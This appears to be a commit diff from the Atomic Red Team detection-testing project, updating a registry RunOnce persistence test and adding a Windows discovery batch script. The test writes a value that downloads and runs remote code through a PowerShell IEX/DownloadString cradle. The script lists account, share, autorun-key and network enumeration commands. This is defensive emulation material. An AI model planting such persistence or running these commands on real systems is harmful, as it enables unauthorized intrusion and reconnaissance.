use ART repo instead of ARTifacts (#2361)
* use ART repo instead of ARTifacts * typo fix
This commit is contained in:
Carrie Roberts
@@ -59,7 +59,7 @@ atomic_tests:
|
||||
executor:
|
||||
command: |
|
||||
$RunOnceKey = "#{reg_key_path}"
|
||||
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
|
||||
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
|
||||
cleanup_command: |
|
||||
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
@@ -106,7 +106,8 @@ atomic_tests:
|
||||
- name: Suspicious bat file run from startup Folder
|
||||
auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
|
||||
description: |
|
||||
bat files can be placed in and executed from the startup folder to maintain persistance.
|
||||
bat files can be placed in and executed from the startup folder to maintain persistance
|
||||
|
||||
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
folder and will also run when the computer is restarted and the user logs in.
|
||||
supported_platforms:
|
||||
|
||||
@@ -0,0 +1,44 @@
|
||||
net user Administrator /domain
|
||||
net Accounts
|
||||
net localgroup administrators
|
||||
net use
|
||||
net share
|
||||
net group "domain admins" /domain
|
||||
net config workstation
|
||||
net accounts
|
||||
net accounts /domain
|
||||
net view
|
||||
sc.exe query
|
||||
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
|
||||
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
|
||||
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
|
||||
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
|
||||
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
|
||||
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
|
||||
wmic useraccount list
|
||||
wmic useraccount get /ALL
|
||||
wmic startup list brief
|
||||
wmic share list
|
||||
wmic service get name,displayname,pathname,startmode
|
||||
wmic process list brief
|
||||
wmic process get caption,executablepath,commandline
|
||||
wmic qfe get description,installedOn /format:csv
|
||||
arp -a
|
||||
whoami
|
||||
ipconfig /displaydns
|
||||
route print
|
||||
netsh advfirewall show allprofiles
|
||||
systeminfo
|
||||
qwinsta
|
||||
quser
|
||||
Reference in New Issue
Block a user